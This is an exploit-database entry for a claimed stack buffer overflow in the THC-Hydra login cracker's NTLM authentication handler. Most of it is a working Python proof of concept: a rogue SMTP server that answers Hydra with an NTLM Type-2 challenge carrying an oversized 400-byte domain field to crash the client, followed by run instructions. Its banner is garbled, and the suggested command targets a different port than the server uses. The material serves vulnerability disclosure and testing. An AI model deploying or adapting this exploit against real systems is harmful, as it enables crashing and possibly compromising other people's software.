Share
## https://sploitus.com/exploit?id=PACKETSTORM:225282
# Exploit Title: Hydra - Stack Buffer Overflow
# CVE: CVE-2026-56766
# Date: 2026-06-26
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Author Blog : https://banyamersecurity.com/blog/
# Vendor Homepage: https://github.com/vanhauser-thc/thc-hydra
# Software Link: https://github.com/vanhauser-thc/thc-hydra
# Affected: Hydra <= 9.7
# Tested on: Hydra 9.5 (Ubuntu 22.04)
# Category: Remote
# Platform: Linux
# Exploit Type: Stack Buffer Overflow
# CVSS: 7.5
# Description: Malicious NTLM Type-2 challenge with excessively long domain
# causes stack buffer overflow in Hydra's NTLM authentication handler
# (SMTP, POP3, IMAP, etc. modules).
# Fixed in: https://github.com/vanhauser-thc/thc-hydra/commit/9cc84c20e75f5fef6bb1790bb9ada2afad2204e2
# Usage:
# python3 exploit.py
#
# Examples:
# python3 exploit.py
#
# Notes:
# โข Run this PoC server first, then launch vulnerable Hydra against it.
# โข Triggers SIGSEGV in vulnerable versions.
#
# How to Use
#
# Step 1: Run the exploit server: python3 exploit.py
# Step 2: Run Hydra: hydra -l test -p test 127.0.0.1 smtp
def banner():
print(r"""
โโโโโโโโ โโโโโโ โโโโ โโโโโโ โโโ โโโโโโ โโโโ โโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ
โโโโโโโโโโโโ โโโโโโ โโโโโโ โโโ โโโ โโโโโโ โโโ โโโโโโโโโโโโโโ โโโ
โโโโโโโ โโโ โโโโโโ โโโโโ โโโ โโโ โโโโโโ โโโโโโโโโโโโโโ โโโ
โโโ Banyamer Security โโโ
""")
import socket
import base64
import struct
import threading
import time
import sys
NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NTLM_TYPE_2 = 2
def create_ntlm_type2_challenge():
challenge = bytearray(NTLMSSP_SIGNATURE)
challenge += struct.pack("<I", NTLM_TYPE_2)
domain_name = b"A" * 400
domain_len = len(domain_name)
flags = 0x00008201
server_challenge = b"\x11\x22\x33\x44\x55\x66\x77\x88"
reserved = b"\x00" * 8
target_name_offset = 48
challenge += struct.pack("<HHI", domain_len, domain_len, target_name_offset)
challenge += struct.pack("<I", flags)
challenge += server_challenge
challenge += reserved
challenge += b"\x00" * 8
challenge += domain_name
return challenge
class SMTPServer:
def __init__(self, host='0.0.0.0', port=2525):
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def handle_client(self, client, addr):
client.send(b"220 poc-smtp-server ESMTP Ready\r\n")
while True:
try:
data = client.recv(4096).decode('utf-8', errors='ignore').strip()
if not data:
break
if data.upper().startswith("EHLO") or data.upper().startswith("HELO"):
client.send(b"250-OK\r\n250 AUTH NTLM\r\n")
elif data.upper().startswith("AUTH NTLM"):
client.send(b"334 NTLM\r\n")
elif len(data) > 10:
type2 = create_ntlm_type2_challenge()
b64_type2 = base64.b64encode(type2).decode('ascii')
client.send(f"334 {b64_type2}\r\n".encode())
time.sleep(1)
client.recv(8192)
client.send(b"235 Authentication successful (fake)\r\n")
break
elif data.upper().startswith("QUIT"):
client.send(b"221 Bye\r\n")
break
except:
break
client.close()
def start(self):
self.sock.bind((self.host, self.port))
self.sock.listen(5)
print(f"[+] Malicious SMTP server listening on {self.host}:{self.port}")
print("[+] Run: hydra -l test -p test 127.0.0.1 smtp")
while True:
client, addr = self.sock.accept()
threading.Thread(target=self.handle_client, args=(client, addr), daemon=True).start()
if __name__ == "__main__":
banner()
try:
server = SMTPServer()
server.start()
except KeyboardInterrupt:
print("\n[+] Server stopped")
except Exception as e:
print(f"[-] Error: {e}")